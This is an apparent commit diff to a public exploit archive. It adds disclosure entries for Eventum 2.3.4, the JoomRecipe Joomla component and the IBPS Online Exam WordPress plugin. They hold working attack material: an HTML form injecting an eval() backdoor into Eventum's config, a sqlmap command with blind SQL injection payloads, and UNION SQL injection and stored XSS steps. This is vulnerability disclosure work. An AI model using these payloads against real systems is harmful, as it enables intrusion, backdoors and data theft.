DB: 2017-07-21
2 new exploits Eventum - 'hostname' Parameter Remote Code Execution Eventum 2.3.4 - 'hostname' Parameter Remote Code Execution Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting
This commit is contained in:
parent
9640473c86
commit
994f3bcd63
4 changed files with 152 additions and 7 deletions
|
@ -36783,7 +36783,7 @@ id,file,description,date,author,platform,type,port
|
|||
39063,platforms/php/webapps/39063.txt,"WordPress Plugin WP E-Commerce - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
|
||||
39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
|
||||
39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0
|
||||
39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0
|
||||
39066,platforms/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0
|
||||
39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0
|
||||
39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80
|
||||
39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
|
||||
|
@ -38154,3 +38154,5 @@ id,file,description,date,author,platform,type,port
|
|||
42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
|
||||
42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
|
||||
42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
|
||||
42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
|
||||
42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,11 +1,84 @@
|
|||
source: http://www.securityfocus.com/bid/65196/info
|
||||
Advisory ID: HTB23198
|
||||
Product: Eventum
|
||||
Vendor: Eventum Development Team
|
||||
Vulnerable Version(s): 2.3.4 and probably prior
|
||||
Tested Version: 2.3.4
|
||||
Advisory Publication: January 22, 2014 [without technical details]
|
||||
Vendor Notification: January 22, 2014
|
||||
Vendor Patch: January 24, 2014
|
||||
Public Disclosure: January 27, 2014
|
||||
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
|
||||
CVE References: CVE-2014-1631, CVE-2014-1632
|
||||
Risk Level: Critical
|
||||
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|
||||
Solution Status: Fixed by Vendor
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
Eventum is prone to remote code execution vulnerability.
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Successfully exploiting this issue allows attackers to execute arbitrary PHP code in the context of the affected application.
|
||||
Advisory Details:
|
||||
|
||||
Eventum prior to 2.3.4 are vulnerable.
|
||||
High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.
|
||||
|
||||
Following example URL is available.
|
||||
|
||||
http://www.example.com/index.php?cmd=phpinfo%28%29;
|
||||
1) Incorrect Default Permissions in Eventum: CVE-2014-1631
|
||||
|
||||
The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
|
||||
|
||||
The installation script can be access by a remote unauthenticated user via the following URL:
|
||||
|
||||
http://[host]/setup/index.php
|
||||
|
||||
|
||||
2) Code Injection in Eventum: CVE-2014-1632
|
||||
|
||||
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.
|
||||
|
||||
The following exploitation example injects a backdoor into "/config/config.php" file:
|
||||
|
||||
|
||||
<form action="http://[host]/setup/index.php" method="post" name="main">
|
||||
<input type="hidden" name="cat" value="install">
|
||||
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
|
||||
<input type="hidden" name="relative" value="/">
|
||||
<input type="hidden" name="db_hostname" value="db_hostname">
|
||||
<input type="hidden" name="db_name" value="db_name">
|
||||
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
|
||||
<input type="hidden" name="drop_tables" value="yes">
|
||||
<input type="hidden" name="db_username" value="db_username">
|
||||
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
|
||||
<input type="hidden" name="setup[smtp][host]" value="localhost">
|
||||
<input type="hidden" name="setup[smtp][port]" value="25">
|
||||
<input type="hidden" name="" value="">
|
||||
<input type="submit" id="btn">
|
||||
</form>
|
||||
|
||||
|
||||
After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:
|
||||
|
||||
http://[host]/index.php?cmd=phpinfo%28%29;
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Update to Eventum 2.3.5
|
||||
|
||||
More Information:
|
||||
https://bugs.launchpad.net/eventum/+bug/1271499
|
||||
|
||||
Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks).
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
|
||||
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
|
||||
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
|
||||
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
18
platforms/php/webapps/42347.txt
Executable file
18
platforms/php/webapps/42347.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability
|
||||
# Date: 20.07.2017
|
||||
# Exploit Author: Teng
|
||||
# Vendor Homepage: http://joomboost.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
|
||||
# Version: 1.0.4
|
||||
# Platform: PHP
|
||||
|
||||
1. Description
|
||||
Blind SQL Injection on Search page, with "search_author" parameter (POST)
|
||||
|
||||
2. Proof of concept
|
||||
sqlmap.py -u "http://localhost/[PATH]/search/results.html" -p search_author --data "searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=" --random-agent --dbs
|
||||
|
||||
Parameter: search_author (POST)
|
||||
Type: boolean-based blind
|
||||
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
|
||||
Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=
|
52
platforms/php/webapps/42351.txt
Executable file
52
platforms/php/webapps/42351.txt
Executable file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi
|
||||
# Date: 2017-07-11
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://elfemo.com/demo/server2/order2032/
|
||||
# Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534
|
||||
# Version: 1.0
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-07-20
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
A Full Featured WordPress Plugin for IBPS Examination.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
Stored XSS on exam input textfields.
|
||||
|
||||
Blind SQL Injection on examapp_UserResult page id parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
Authenticated Stored XSS:
|
||||
|
||||
Logged as a student:
|
||||
Write the payload in the input textfields while attempting an exam. The payload will execute on My Results > View Details:
|
||||
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=[xx]
|
||||
|
||||
Blind SQL Injection
|
||||
|
||||
Logged as a student:
|
||||
|
||||
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 17 columns
|
||||
Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
Loading…
Add table
Reference in a new issue